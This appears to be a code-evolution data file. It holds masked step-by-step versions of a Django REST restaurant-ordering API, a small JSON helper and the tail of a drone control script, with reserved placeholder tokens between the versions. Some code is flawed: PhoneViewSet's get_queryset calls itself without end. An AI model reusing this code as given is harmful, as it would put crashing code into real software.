glob_sp[0 : 2]\n coord[0 : 2] = gps_meters_offset(start_gps, glob_sp[0 : 2])\n if glob_sp[2] != None:\n coord[2] = glob_sp[2] - params.start_alt\n else:\n coord[2] = prev_setp_rel[2]\n else:\n # local position update:\n for i in xrange(3):\n name = 'p%d' % i\n if move_data.HasField(name):\n if arg.rel:\n print 'local, rel'\n # relative local coordinate:\n coord[i] = prev_setp_rel[i] + getattr(move_data, name)\n else:\n print 'local, abs'\n # absolute local coordinate:\n coord[i] = getattr(move_data, name)\n else:\n coord[i] = prev_setp_rel[i]\n \n print 'coord output:', coord\n self.icarus.setpoints = coord\n # set position\n pilot.set_ctrl_param(POS_E, coord[0])\n pilot.set_ctrl_param(POS_N, coord[1])\n \n \"\"\"\n # did the altitude change?:\n if coord[2] != prev_setp_rel[2]:\n # set up linear z interpolation between start and destination points:\n dist = hypot(prev_setp_rel[0] - coord[0], prev_setp_rel[1] - coord[1])\n z_interp = LinearInterpolation(0.0, start_z, dist, coord[2]) \n # update z setpoint linearly between starting position and destination:\n target_dist = hypot(pilot.mon[5], pilot.mon[6])\n while target_dist > self.LAT_STAB_EPSILON:\n sleep(1)\n if self.canceled:\n pilot.set_ctrl_param(POS_N, pilot.mon[0])\n pilot.set_ctrl_param(POS_E, pilot.mon[1])\n pilot.set_ctrl_param(POS_U, pilot.mon[2])\n self.stabilize()\n return # not going into hovering state\n z = z_interp(dist - target_dist)\n # check elevation map:\n srtm_z = 1000.0 #_srtm_elev_map.lookup(lat, lon) - params.start_alt\n if z < srtm_alt + self.SRTM_SAFETY_ALT:\n z = srtm_alt + self.SRTM_SAFETY_ALT\n pilot.set_ctrl_param(POS_Z, z)\n \"\"\"\n\n self.stabilize()\n if not self.canceled:\n fsm.handle('done')\n\n\n def _cancel(self):\n self.canceled = True\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def from_json_string(my_str):
"""Function returns a JSON file representation of an object (string)"""
return json.loads(my_str)
<|reserved_special_token_1|>
import json
def from_json_string(my_str):
"""Function returns a JSON file representation of an object (string)"""
return json.loads(my_str)
<|reserved_special_token_1|>
#!/usr/bin/python3
import json
def from_json_string(my_str):
"""Function returns a JSON file representation of an object (string)"""
return json.loads(my_str)
|
flexible
|
{
"blob_id": "b748c489b2c63546feada811aa3b66146ad8d28e",
"index": 9450,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n return json.loads(my_str)\n",
"step-3": "import json\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n return json.loads(my_str)\n",
"step-4": "#!/usr/bin/python3\nimport json\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n\n return json.loads(my_str)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class RestaurantViewSet(ModelViewSet):
serializer_class = RestaurantSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Restaurant.objects.all()
def _get_recommended_restaurants(self) ->queryset:
queryset = self.get_queryset()
recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))
return recommended
def _get_special_restaurants(self) ->queryset:
queryset = self.get_queryset()
special_offers_restaurants = queryset.filter(Q(menus__discount__gt=
0) | Q(on_special_day=True))
return special_offers_restaurants
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
recommended = self._get_recommended_restaurants().order_by('?')[:5]
special = self._get_special_restaurants().order_by('?')[:5]
all_restaurants = self.get_queryset().order_by('?')[:5]
recommended = self.get_serializer(recommended, many=True).data
special = self.get_serializer(special, many=True).data
all_restaurants = self.get_serializer(all_restaurants, many=True).data
response = {'recommended': recommended, 'special': special, 'all':
all_restaurants}
return Response(response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_special_restaurants().
order_by('-created_at'), many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_recommended_restaurants(
).order_by('-rates_avg'), many=True)
return Response(serializer.data)
@action(['get'], detail=True, url_path='restaurant-menus')
def get_restaurant_menus(self, request, *args, **kwargs):
categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(
restaurant_id=self.kwargs.get('pk'))
return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
serializer_class = MenuSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Menu.objects.all()
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]
recommended = queryset.all().order_by('?')[:5]
special_offers = self.get_serializer(special_offers, many=True).data
recommended = self.get_serializer(recommended, many=True).data
response = {'recommended': recommended, 'special_offers':
special_offers}
return Response(data=response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'
)
serializer = self.get_serializer(special_offers, many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
recommended = queryset.all().order_by('-created_at')
serializer = self.get_serializer(recommended, many=True)
return Response(serializer.data)
class OrderViewSet(ModelViewSet):
serializer_class = OrderWRestaurantSerializer
permission_classes = [permissions.IsAuthenticated]
queryset = Order.objects.all().order_by('-created_at')
def get_serializer(self, *args, **kwargs):
if self.action == 'create':
return OrderSerializer(*args, **kwargs)
return super(OrderViewSet, self).get_serializer(*args, **kwargs)
def get_queryset(self):
return super(OrderViewSet, self).get_queryset().filter(client=self.
request.user.client)
def create(self, request, *args, **kwargs):
fixer = RequestDataFixer(request=request)
return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
serializer_class = OrderLineSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = OrderLine.objects.all()
class WilayaViewSet(ModelViewSet):
serializer_class = WilayaSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Wilaya.objects.all()
class CityViewSet(ModelViewSet):
serializer_class = CitySerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = City.objects.all()
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Address.objects.all()
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.
user.client).update(default=False)
return Response(self.get_serializer(instance).data)
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(belongs_to=request.user.client).update(
default=False)
return Response({'status': True})
def get_queryset(self):
return super(AddressViewSet, self).get_queryset().filter(belongs_to
=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({'status': True})
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user
).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
return self.get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MealTypeViewSet(ModelViewSet):
permission_classes = [my_perms.IsAdminOrReadOnly]
serializer_class = MealTypeSerializer
queryset = MealType.objects.all()
def get_serializer(self, *args, **kwargs):
if self.action == 'get_types_with_menus':
serializer_class = MealTypesWithMenuSerializer
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
@action(['get'], detail=False, url_path='type-with-menus')
def get_types_with_menus(self, request, *args, **kwargs):
types = self.get_queryset().filter(menus__offered_by=request.
query_params.get('restaurant', 0))
types = self.get_serializer(types, many=True).data
return Response(types)
class RestaurantTypeViewSet(ModelViewSet):
serializer_class = RestaurantTypeSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = RestaurantType.objects.all()
class RestaurantViewSet(ModelViewSet):
serializer_class = RestaurantSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Restaurant.objects.all()
def _get_recommended_restaurants(self) ->queryset:
queryset = self.get_queryset()
recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))
return recommended
def _get_special_restaurants(self) ->queryset:
queryset = self.get_queryset()
special_offers_restaurants = queryset.filter(Q(menus__discount__gt=
0) | Q(on_special_day=True))
return special_offers_restaurants
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
recommended = self._get_recommended_restaurants().order_by('?')[:5]
special = self._get_special_restaurants().order_by('?')[:5]
all_restaurants = self.get_queryset().order_by('?')[:5]
recommended = self.get_serializer(recommended, many=True).data
special = self.get_serializer(special, many=True).data
all_restaurants = self.get_serializer(all_restaurants, many=True).data
response = {'recommended': recommended, 'special': special, 'all':
all_restaurants}
return Response(response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_special_restaurants().
order_by('-created_at'), many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_recommended_restaurants(
).order_by('-rates_avg'), many=True)
return Response(serializer.data)
@action(['get'], detail=True, url_path='restaurant-menus')
def get_restaurant_menus(self, request, *args, **kwargs):
categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(
restaurant_id=self.kwargs.get('pk'))
return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
serializer_class = MenuSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Menu.objects.all()
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]
recommended = queryset.all().order_by('?')[:5]
special_offers = self.get_serializer(special_offers, many=True).data
recommended = self.get_serializer(recommended, many=True).data
response = {'recommended': recommended, 'special_offers':
special_offers}
return Response(data=response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'
)
serializer = self.get_serializer(special_offers, many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
recommended = queryset.all().order_by('-created_at')
serializer = self.get_serializer(recommended, many=True)
return Response(serializer.data)
class OrderViewSet(ModelViewSet):
serializer_class = OrderWRestaurantSerializer
permission_classes = [permissions.IsAuthenticated]
queryset = Order.objects.all().order_by('-created_at')
def get_serializer(self, *args, **kwargs):
if self.action == 'create':
return OrderSerializer(*args, **kwargs)
return super(OrderViewSet, self).get_serializer(*args, **kwargs)
def get_queryset(self):
return super(OrderViewSet, self).get_queryset().filter(client=self.
request.user.client)
def create(self, request, *args, **kwargs):
fixer = RequestDataFixer(request=request)
return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
serializer_class = OrderLineSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = OrderLine.objects.all()
class WilayaViewSet(ModelViewSet):
serializer_class = WilayaSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Wilaya.objects.all()
class CityViewSet(ModelViewSet):
serializer_class = CitySerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = City.objects.all()
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Address.objects.all()
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.
user.client).update(default=False)
return Response(self.get_serializer(instance).data)
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(belongs_to=request.user.client).update(
default=False)
return Response({'status': True})
def get_queryset(self):
return super(AddressViewSet, self).get_queryset().filter(belongs_to
=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({'status': True})
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user
).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
return self.get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CuisineViewSet(ModelViewSet):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MealTypeViewSet(ModelViewSet):
permission_classes = [my_perms.IsAdminOrReadOnly]
serializer_class = MealTypeSerializer
queryset = MealType.objects.all()
def get_serializer(self, *args, **kwargs):
if self.action == 'get_types_with_menus':
serializer_class = MealTypesWithMenuSerializer
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
@action(['get'], detail=False, url_path='type-with-menus')
def get_types_with_menus(self, request, *args, **kwargs):
types = self.get_queryset().filter(menus__offered_by=request.
query_params.get('restaurant', 0))
types = self.get_serializer(types, many=True).data
return Response(types)
class RestaurantTypeViewSet(ModelViewSet):
serializer_class = RestaurantTypeSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = RestaurantType.objects.all()
class RestaurantViewSet(ModelViewSet):
serializer_class = RestaurantSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Restaurant.objects.all()
def _get_recommended_restaurants(self) ->queryset:
queryset = self.get_queryset()
recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))
return recommended
def _get_special_restaurants(self) ->queryset:
queryset = self.get_queryset()
special_offers_restaurants = queryset.filter(Q(menus__discount__gt=
0) | Q(on_special_day=True))
return special_offers_restaurants
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
recommended = self._get_recommended_restaurants().order_by('?')[:5]
special = self._get_special_restaurants().order_by('?')[:5]
all_restaurants = self.get_queryset().order_by('?')[:5]
recommended = self.get_serializer(recommended, many=True).data
special = self.get_serializer(special, many=True).data
all_restaurants = self.get_serializer(all_restaurants, many=True).data
response = {'recommended': recommended, 'special': special, 'all':
all_restaurants}
return Response(response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_special_restaurants().
order_by('-created_at'), many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_recommended_restaurants(
).order_by('-rates_avg'), many=True)
return Response(serializer.data)
@action(['get'], detail=True, url_path='restaurant-menus')
def get_restaurant_menus(self, request, *args, **kwargs):
categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(
restaurant_id=self.kwargs.get('pk'))
return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
serializer_class = MenuSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Menu.objects.all()
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]
recommended = queryset.all().order_by('?')[:5]
special_offers = self.get_serializer(special_offers, many=True).data
recommended = self.get_serializer(recommended, many=True).data
response = {'recommended': recommended, 'special_offers':
special_offers}
return Response(data=response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'
)
serializer = self.get_serializer(special_offers, many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
recommended = queryset.all().order_by('-created_at')
serializer = self.get_serializer(recommended, many=True)
return Response(serializer.data)
class OrderViewSet(ModelViewSet):
serializer_class = OrderWRestaurantSerializer
permission_classes = [permissions.IsAuthenticated]
queryset = Order.objects.all().order_by('-created_at')
def get_serializer(self, *args, **kwargs):
if self.action == 'create':
return OrderSerializer(*args, **kwargs)
return super(OrderViewSet, self).get_serializer(*args, **kwargs)
def get_queryset(self):
return super(OrderViewSet, self).get_queryset().filter(client=self.
request.user.client)
def create(self, request, *args, **kwargs):
fixer = RequestDataFixer(request=request)
return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
serializer_class = OrderLineSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = OrderLine.objects.all()
class WilayaViewSet(ModelViewSet):
serializer_class = WilayaSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Wilaya.objects.all()
class CityViewSet(ModelViewSet):
serializer_class = CitySerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = City.objects.all()
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Address.objects.all()
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.
user.client).update(default=False)
return Response(self.get_serializer(instance).data)
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(belongs_to=request.user.client).update(
default=False)
return Response({'status': True})
def get_queryset(self):
return super(AddressViewSet, self).get_queryset().filter(belongs_to
=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({'status': True})
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user
).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
return self.get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CuisineViewSet(ModelViewSet):
serializer_class = CuisineSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Cuisine.objects.all()
class MealTypeViewSet(ModelViewSet):
permission_classes = [my_perms.IsAdminOrReadOnly]
serializer_class = MealTypeSerializer
queryset = MealType.objects.all()
def get_serializer(self, *args, **kwargs):
if self.action == 'get_types_with_menus':
serializer_class = MealTypesWithMenuSerializer
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
@action(['get'], detail=False, url_path='type-with-menus')
def get_types_with_menus(self, request, *args, **kwargs):
types = self.get_queryset().filter(menus__offered_by=request.
query_params.get('restaurant', 0))
types = self.get_serializer(types, many=True).data
return Response(types)
class RestaurantTypeViewSet(ModelViewSet):
serializer_class = RestaurantTypeSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = RestaurantType.objects.all()
class RestaurantViewSet(ModelViewSet):
serializer_class = RestaurantSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Restaurant.objects.all()
def _get_recommended_restaurants(self) ->queryset:
queryset = self.get_queryset()
recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))
return recommended
def _get_special_restaurants(self) ->queryset:
queryset = self.get_queryset()
special_offers_restaurants = queryset.filter(Q(menus__discount__gt=
0) | Q(on_special_day=True))
return special_offers_restaurants
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
recommended = self._get_recommended_restaurants().order_by('?')[:5]
special = self._get_special_restaurants().order_by('?')[:5]
all_restaurants = self.get_queryset().order_by('?')[:5]
recommended = self.get_serializer(recommended, many=True).data
special = self.get_serializer(special, many=True).data
all_restaurants = self.get_serializer(all_restaurants, many=True).data
response = {'recommended': recommended, 'special': special, 'all':
all_restaurants}
return Response(response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_special_restaurants().
order_by('-created_at'), many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_recommended_restaurants(
).order_by('-rates_avg'), many=True)
return Response(serializer.data)
@action(['get'], detail=True, url_path='restaurant-menus')
def get_restaurant_menus(self, request, *args, **kwargs):
categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(
restaurant_id=self.kwargs.get('pk'))
return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
serializer_class = MenuSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Menu.objects.all()
@action(['get'], detail=False, url_path='get-home')
def home(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]
recommended = queryset.all().order_by('?')[:5]
special_offers = self.get_serializer(special_offers, many=True).data
recommended = self.get_serializer(recommended, many=True).data
response = {'recommended': recommended, 'special_offers':
special_offers}
return Response(data=response)
@action(['get'], detail=False, url_path='special-offers')
def special_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at'
)
serializer = self.get_serializer(special_offers, many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path='recommended-offers')
def recommended_offers(self, request, *args, **kwargs):
queryset = self.get_queryset()
recommended = queryset.all().order_by('-created_at')
serializer = self.get_serializer(recommended, many=True)
return Response(serializer.data)
class OrderViewSet(ModelViewSet):
serializer_class = OrderWRestaurantSerializer
permission_classes = [permissions.IsAuthenticated]
queryset = Order.objects.all().order_by('-created_at')
def get_serializer(self, *args, **kwargs):
if self.action == 'create':
return OrderSerializer(*args, **kwargs)
return super(OrderViewSet, self).get_serializer(*args, **kwargs)
def get_queryset(self):
return super(OrderViewSet, self).get_queryset().filter(client=self.
request.user.client)
def create(self, request, *args, **kwargs):
fixer = RequestDataFixer(request=request)
return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
serializer_class = OrderLineSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = OrderLine.objects.all()
class WilayaViewSet(ModelViewSet):
serializer_class = WilayaSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Wilaya.objects.all()
class CityViewSet(ModelViewSet):
serializer_class = CitySerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = City.objects.all()
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Address.objects.all()
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.
user.client).update(default=False)
return Response(self.get_serializer(instance).data)
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(belongs_to=request.user.client).update(
default=False)
return Response({'status': True})
def get_queryset(self):
return super(AddressViewSet, self).get_queryset().filter(belongs_to
=self.request.user.client)
class PhoneViewSet(ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
serializer_class = PhoneSerializer
queryset = Phone.objects.all()
@action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
def set_main(self, request, *args, **kwargs):
self.get_queryset().filter(user=request.user).update(default=False)
return Response({'status': True})
@action(['PUT'], detail=True, url_path='set-default', url_name=
'set-default')
def set_default(self, request, *args, **kwargs):
instance = self.get_object()
instance.default = True
instance.save()
self.get_queryset().filter(~Q(pk=instance.pk), user=request.user
).update(default=False)
return Response(self.get_serializer(instance).data)
def get_queryset(self):
return self.get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
from django.db.models import Q, Avg
from django.http import JsonResponse
from rest_framework import permissions
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from base_backend import permissions as my_perms
from base_backend.utils import RequestDataFixer
from restaurants.models import User, Cuisine, MealType, AppVersion, RestaurantType, Restaurant, Menu, Order, OrderLine, \
Wilaya, City, Address, Phone
from restaurants.serializers import UserSerializer, SmsConfirmationSerializer, CuisineSerializer, \
RestaurantTypeSerializer, RestaurantSerializer, MenuSerializer, OrderLineSerializer, WilayaSerializer, \
CitySerializer, OrderWRestaurantSerializer, MealTypesWithMenuSerializer, MealTypeSerializer, OrderSerializer, \
AddressSerializer, PhoneSerializer
class LoginApi(ObtainAuthToken):
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,
context=dict(request=request))
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response(
dict(
token=token.key,
user_id=user.pk,
phone=user.phone,
email=user.email,
type=user.user_type,
photo=user.photo.url if user.photo else None,
address=user.address,
city=user.lives_in_id,
birth_date=user.birth_date,
username=user.username,
# is_participant=user.client.is_participant if user.client is not None else None,
# participant_id=user.client.participant.participant_id if user.client else None,
)
)
class UserViewSet(ModelViewSet):
serializer_class = UserSerializer
queryset = User.objects.filter(is_active=True)
def get_permissions(self):
if self.action == 'create' or self.action == 'register':
return [permissions.AllowAny()]
else:
return [permissions.IsAuthenticatedOrReadOnly()]
@action(methods=['post'], detail=False, url_path='register', permission_classes=[permissions.AllowAny()])
def register(self, request, *args, **kwargs):
response = super().create(request, *args, **kwargs)
if response:
response.data = dict(status=True, code=4)
return response
def create(self, request, *args, **kwargs):
return self.register(request, *args, **kwargs)
class OtpApi(APIView):
permission_classes = [permissions.AllowAny]
def get(self, request):
serializer = SmsConfirmationSerializer(data=request.GET)
result = serializer.resend()
if result:
response = dict(status=True, code=5)
else:
response = dict(status=False, code=21)
return Response(response)
def put(self, request):
serializer = SmsConfirmationSerializer(data=request.data)
result = serializer.activate()
if result:
response = dict(status=True, code=5)
else:
response = dict(status=False, code=20)
return Response(response)
class CuisineViewSet(ModelViewSet):
serializer_class = CuisineSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = Cuisine.objects.all()
class MealTypeViewSet(ModelViewSet):
permission_classes = [my_perms.IsAdminOrReadOnly]
serializer_class = MealTypeSerializer
queryset = MealType.objects.all()
def get_serializer(self, *args, **kwargs):
if self.action == "get_types_with_menus":
serializer_class = MealTypesWithMenuSerializer
kwargs['context'] = self.get_serializer_context()
return serializer_class(*args, **kwargs)
return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
@action(['get'], detail=False, url_path="type-with-menus", )
def get_types_with_menus(self, request, *args, **kwargs):
types = self.get_queryset().filter(menus__offered_by=request.query_params.get('restaurant', 0))
types = self.get_serializer(types, many=True).data
return Response(types)
class RestaurantTypeViewSet(ModelViewSet):
serializer_class = RestaurantTypeSerializer
permission_classes = [my_perms.IsAdminOrReadOnly]
queryset = RestaurantType.objects.all()
class RestaurantViewSet(ModelViewSet):
serializer_class = RestaurantSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Restaurant.objects.all()
def _get_recommended_restaurants(self) -> queryset:
queryset = self.get_queryset()
recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))
return recommended
def _get_special_restaurants(self) -> queryset:
queryset = self.get_queryset()
special_offers_restaurants = queryset.filter(Q(menus__discount__gt=0) | Q(on_special_day=True))
return special_offers_restaurants
@action(['get'], detail=False, url_path="get-home")
def home(self, request, *args, **kwargs):
recommended = self._get_recommended_restaurants().order_by('?')[:5]
special = self._get_special_restaurants().order_by('?')[:5]
all_restaurants = self.get_queryset().order_by('?')[:5]
recommended = self.get_serializer(recommended, many=True).data
special = self.get_serializer(special, many=True).data
all_restaurants = self.get_serializer(all_restaurants, many=True).data
response = {
'recommended': recommended,
'special': special,
'all': all_restaurants
}
return Response(response)
@action(['get'], detail=False, url_path="special-offers")
def special_offers(self, request, *args, **kwargs):
serializer = self.get_serializer(self._get_special_restaurants().order_by('-created_at'), many=True)
return Response(serializer.data)
@action(['get'], detail=False, url_path="recommended-offers")
def recommended_offers(self, request, *args, **kwargs):
